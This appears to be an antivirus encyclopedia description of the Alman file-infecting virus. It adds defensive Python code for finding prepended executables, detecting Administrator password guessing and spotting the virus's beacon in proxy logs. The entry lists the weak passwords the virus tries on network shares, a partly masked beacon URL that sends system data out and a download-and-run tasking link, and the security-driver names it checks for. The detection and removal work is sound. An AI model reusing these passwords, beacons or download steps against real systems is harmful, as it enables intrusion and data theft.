Detection added: Apr 17 2007 11:26 GMT
Description added: Sep 05 2007
Behavior: Virus
Virus.Win32.Alman.a
This virus infects Windows executable files. The virus body is itself a Windows PE EXE file.
Installation
When launched, the virus extracts the following files from its body:
%WinDir%\AppPatch\deamon.dll - this file is 3072 bytes in size;
%WinDir%\c_126.nls - this file is 31744 bytes in size.
It creates the following registry key:
[HKCR\CLSID\{C111980D-B372-44b4-8095-1B6060E8C647}]
which contains a link to the virus executable file.
The virus infects all write-accessible Windows executable files (PE EXE) on
all disks of the victim computer and in accessible network folders. The virus
does not infect files with the following names:
wooolcfg.exe
woool.exe
ztconfig.exe
patchupdate.exe
trojankiller.exe
xy2player.exe
flyff.exe
xy2.exe
au_unins_web.exe
cabal.exe
cabalmain9x.exe
cabalmain.exe
meteor.exe
patcher.exe
mjonline.exe
config.exe
zuonline.exe
userpic.exe
main.exe
dk2.exe
autoupdate.exe
dbfsupdate.exe
asktao.exe
sealspeed.exe
xlqy2.exe
game.exe
wb-service.exe
nbt-dragonraja2006.exe
dragonraja.exe
mhclient-connect.exe
hs.exe
mts.exe
gc.exe
zfs.exe
neuz.exe
maplestory.exe
nsstarter.exe
nmcosrv.exe
ca.exe
nmservice.exe
kartrider.exe
audition.exe
zhengtu.exe
The virus writes its own body to the beginning of each file it infects, shifting
the original contents of the file downwards (a prepending infector).
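A forensic check for this infection pattern, added here as an example and not taken from the description or from any Kaspersky tool: because the virus prepends itself to a PE file and, as described above, only shifts the original contents down, the original image survives intact further into the file. The scanner below walks a buffer for every "MZ" header whose e_lfanew field points at a valid "PE\0\0" signature; a file that starts with one PE image and contains a second one is split at the second header. The images produced by make_min_pe are constructed test data (the smallest layout the scanner accepts, not loadable executables). The check is a heuristic: a prepender that encrypts or compresses the original body, or a legitimate file that embeds another executable (an installer, a self-extractor), is not distinguished by it, so a recovered image should be validated (section table, entry point) before it replaces the infected file.

```python
import struct

MZ = b"MZ"
PE_SIG = b"PE\x00\x00"
DOS_HEADER_LEN = 0x40      # e_lfanew lives at offset 0x3C of the DOS header


def find_pe_images(data):
    """Return the offset of every plausible PE image inside data.

    A candidate is an 'MZ' whose e_lfanew field points, within the buffer,
    at a 'PE\\0\\0' signature. Random 'MZ' byte pairs in code or data almost
    never satisfy that, so the heuristic produces few false hits.
    """
    hits = []
    pos = data.find(MZ)
    while pos != -1:
        if pos + DOS_HEADER_LEN <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            pe = pos + e_lfanew
            if e_lfanew >= DOS_HEADER_LEN and data[pe:pe + 4] == PE_SIG:
                hits.append(pos)
        pos = data.find(MZ, pos + 1)
    return hits


def split_prepended(data):
    """If data is a PE image with a second PE image stored after it, return
    (prepended_body, original_image); otherwise None."""
    images = find_pe_images(data)
    if len(images) < 2 or images[0] != 0:
        return None
    cut = images[1]
    return data[:cut], data[cut:]


def make_min_pe(payload):
    """Constructed test data: DOS header with e_lfanew=0x40, PE signature,
    a minimal COFF file header, then payload. Not a loadable executable."""
    dos = MZ + b"\x00" * (0x3C - 2) + struct.pack("<I", DOS_HEADER_LEN)
    # i386, 1 section, no symbols, 0xE0-byte optional header, EXECUTABLE_IMAGE|32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 0xE0, 0x0102)
    return dos + PE_SIG + coff + payload


def demo():
    """Build an 'infected' buffer the way the description says the virus lays
    it out (virus body first, original program after it) and scan it."""
    virus = make_min_pe(b"[virus body]")
    original = make_min_pe(b"[original program]")
    infected = virus + original
    return find_pe_images(infected), split_prepended(infected)


if __name__ == "__main__":
    offsets, parts = demo()
    print("PE images at offsets:", offsets)
    print("recovered original starts with:", parts[1][:2])
```

On a real disk image, run find_pe_images over each PE EXE on the system and the reachable shares; any file reporting two images at offset 0 and some fixed offset N, with the same N across many files, is the signature of a prepender with a fixed-size body.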
In order to infect files located in network folders, the virus attempts to
connect to remote machines using the Administrator account and one of the following
passwords:
zxcv
qazwsx
qaz
qwer
!@#$%^&*()
!@#$%^&*(
!@#$%^&*
!@#$%^&
!@#$%^
!@#$%
aasdf
sdfgh
!@#$
654321
123456
12345
1234
123
111
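The share-spreading step is visible on the targeted hosts as a burst of failed network logons for Administrator from one source, optionally followed by a success once a listed password matches. The detector below is an added example, not part of the description: it runs over a constructed flat export of Windows Security events (field names follow the 4625/4624 schema; the lines themselves are made up), groups failures by source IP and target account for network logons only (LogonType 3), raises an alert when a source exceeds a threshold within a sliding window, and escalates when a 4624 from a flagged source follows. Threshold, window and the export format are assumptions to adapt to the real log source.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: "<timestamp> key=value ..." lines, not real logs.
SAMPLE_EVENTS = """\
2007-04-17 11:26:00 EventID=4625 TargetUserName=Administrator LogonType=3 IpAddress=10.0.0.5 Status=0xC000006D
2007-04-17 11:26:01 EventID=4625 TargetUserName=Administrator LogonType=3 IpAddress=10.0.0.5 Status=0xC000006D
2007-04-17 11:26:01 EventID=4625 TargetUserName=bob LogonType=3 IpAddress=10.0.0.9 Status=0xC000006D
2007-04-17 11:26:02 EventID=4625 TargetUserName=Administrator LogonType=3 IpAddress=10.0.0.5 Status=0xC000006D
2007-04-17 11:26:02 EventID=4625 TargetUserName=Administrator LogonType=2 IpAddress=127.0.0.1 Status=0xC000006D
2007-04-17 11:26:03 EventID=4625 TargetUserName=Administrator LogonType=3 IpAddress=10.0.0.5 Status=0xC000006D
2007-04-17 11:26:04 EventID=4625 TargetUserName=Administrator LogonType=3 IpAddress=10.0.0.5 Status=0xC000006D
2007-04-17 11:26:05 EventID=4625 TargetUserName=Administrator LogonType=3 IpAddress=10.0.0.5 Status=0xC000006D
2007-04-17 11:26:06 EventID=4624 TargetUserName=Administrator LogonType=3 IpAddress=10.0.0.5
""".splitlines()

LINE_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (.*)$")


def parse_event(line):
    """Split one export line into (timestamp, {field: value}); None if malformed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
    fields = dict(kv.split("=", 1) for kv in m.group(2).split() if "=" in kv)
    return ts, fields


def detect_password_guessing(lines, threshold=5, window=timedelta(seconds=60)):
    """Alert on >= threshold failed network logons for one (source, account)
    inside the window, and again if that source then logs on successfully."""
    failures = defaultdict(list)   # (source IP, target user) -> recent 4625 timestamps
    flagged = set()
    alerts = []
    for line in lines:
        parsed = parse_event(line)
        if parsed is None:
            continue
        ts, f = parsed
        if f.get("LogonType") != "3":          # network logons only (admin shares, SMB)
            continue
        key = (f.get("IpAddress"), f.get("TargetUserName"))
        if f.get("EventID") == "4625":
            recent = [t for t in failures[key] if ts - t <= window]
            recent.append(ts)
            failures[key] = recent
            if len(recent) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append({"kind": "password_guessing", "source": key[0],
                               "user": key[1], "failures": len(recent), "at": ts})
        elif f.get("EventID") == "4624" and key in flagged:
            alerts.append({"kind": "success_after_guessing", "source": key[0],
                           "user": key[1], "at": ts})
    return alerts


if __name__ == "__main__":
    for alert in detect_password_guessing(SAMPLE_EVENTS):
        print(alert)
```

The password list above is short, so a worm exhausts it against a host in seconds; aggregate by source IP across all hosts as well, and treat the same source subsequently writing to many executables on an admin share as the follow-on signal, since that is what the description says happens after a successful connection.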
The virus also sends the following information about the victim machine to
the remote malicious user's site: the amount of free space on drive C:, the
operating system version, the Internet Explorer version, and which of the
following driver names are present in the system:
Hooksys
KWatch3
KregEx
KLPF
NaiAvFilter1
NAVAP
AVGNTMGR
AvgTdi
nod32drv
PavProtect
TMFilter
BDFsDrv
VETFDDNT
This information is sent in the following request to the remote malicious
user's site:
http://****mrw0rldwide.com/co.asp?action=post&HD=<amount of free space>&OT=<operating system version>&IV=<version of Internet Explorer>&AV=<installed drivers>
The virus also gets a list of files to be downloaded from the following link:
http://****mrw0rldwide.com/z.dat
It then downloads files from the list, saves them to the Windows temporary
directory and launches them for execution.
At the time of writing, the virus downloaded files from the following links:
http://down****net/css.jpg
http://down****net/wow.jpg
and saved them as shown below:
%Temp%\css.jpg - this file is 62792 bytes in size. It will be detected by Kaspersky
Anti-Virus as Trojan-PSW.Win32.OnLineGames.afd;
%Temp%\wow.jpg - this file is 40241 bytes in size. It will be detected by Kaspersky
Anti-Virus as Trojan-PSW.Win32.WOW.sv.
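The beacon, the z.dat tasking fetch and the follow-on downloads described above form a sequence that a web proxy log exposes. The scanner below is an added example, not code from the description: it keys on the request path and the query parameters the description lists (action=post with HD, OT, IV and AV) rather than on the host, because the description masks the real hostnames and a C2 host changes more easily than the beacon format. A client that fetches z.dat is then watched for a short window, and any .jpg it downloads in that window is reported as a payload candidate, matching the description's executables disguised as images. The proxy lines are constructed; the hostnames c2.example and dl.example, the log layout and the ten-minute window are assumptions.

```python
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

BEACON_PARAMS = {"action", "HD", "OT", "IV", "AV"}   # query keys the description lists
PAYLOAD_WINDOW = timedelta(minutes=10)

# Constructed proxy log: "<UTC time> <client> <method> <url> <status>". Hostnames are
# placeholders; the description masks the real ones, so the rules match path and query only.
SAMPLE_LOG = """\
2007-04-17T11:30:00Z 10.0.0.5 GET http://c2.example/co.asp?action=post&HD=12034&OT=5.1&IV=6.0&AV=NAVAP 200
2007-04-17T11:30:02Z 10.0.0.5 GET http://c2.example/z.dat 200
2007-04-17T11:30:05Z 10.0.0.5 GET http://dl.example/css.jpg 200
2007-04-17T11:30:06Z 10.0.0.5 GET http://dl.example/wow.jpg 200
2007-04-17T11:31:00Z 10.0.0.7 GET http://www.example.com/photo.jpg 200
2007-04-17T11:31:10Z 10.0.0.7 GET http://www.example.com/co.asp?action=view&id=3 200
""".splitlines()


def parse_line(line):
    """Split one proxy line into (timestamp, client IP, URL)."""
    ts, client, _method, url, _status = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), client, url


def classify_url(url):
    """Return ('beacon' | 'tasking' | None, parsed query) for one request."""
    parts = urlsplit(url)
    path = parts.path.lower()
    qs = parse_qs(parts.query, keep_blank_values=True)   # AV= may be empty when no driver matched
    if path.endswith("/co.asp") and qs.get("action") == ["post"] and BEACON_PARAMS <= set(qs):
        return "beacon", qs
    if path.endswith("/z.dat"):
        return "tasking", qs
    return None, qs


def scan_proxy_log(lines):
    """Emit beacon, tasking and payload-candidate alerts per client."""
    alerts = []
    tasked_at = {}                      # client -> time of its last z.dat fetch
    for line in lines:
        ts, client, url = parse_line(line)
        kind, qs = classify_url(url)
        if kind == "beacon":
            # The description does not say how several driver names are delimited,
            # so the AV value is reported raw.
            alerts.append({"client": client, "kind": kind, "os": qs["OT"][0],
                           "reported_av": qs["AV"][0], "url": url})
        elif kind == "tasking":
            tasked_at[client] = ts
            alerts.append({"client": client, "kind": kind, "url": url})
        elif (client in tasked_at and ts - tasked_at[client] <= PAYLOAD_WINDOW
              and urlsplit(url).path.lower().endswith(".jpg")):
            alerts.append({"client": client, "kind": "payload_candidate", "url": url})
    return alerts


if __name__ == "__main__":
    for alert in scan_proxy_log(SAMPLE_LOG):
        print(alert)
```

Where the proxy records response bodies or content types, a stronger payload rule is a .jpg response that begins with "MZ": the description's css.jpg and wow.jpg are Windows executables, not images. The AV value in the beacon is also worth keeping, since it tells you which of the listed security drivers the infected host reported to the attacker.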
If your computer does not have an up-to-date antivirus, or does not have an
antivirus solution at all, follow the instructions below to delete the malicious
program:
- Use Task Manager to terminate the malicious process.
- Delete the original virus file (the location will depend on how
the program originally penetrated the victim machine).
- Delete the following key from the system registry (see "What is a system
registry and how do I use it" for details on how to edit the registry):
[HKCR\CLSID\{C111980D-B372-44b4-8095-1B6060E8C647}]
- Delete the following files:
%WinDir%\AppPatch\deamon.dll
%WinDir%\c_126.nls
%Temp%\css.jpg
%Temp%\wow.jpg
- Delete all copies of the virus from the hard disk. Because the virus infects
write-accessible PE EXE files on all disks and in network folders, infected
executables must be found and disinfected or restored from clean copies; removing
the dropped files above is not enough.
- If the local Administrator password is one of those listed above, change it,
since the virus uses that list to reach network folders.
- Update your antivirus databases and perform a full scan of the
computer (download a trial version of Kaspersky Anti-Virus).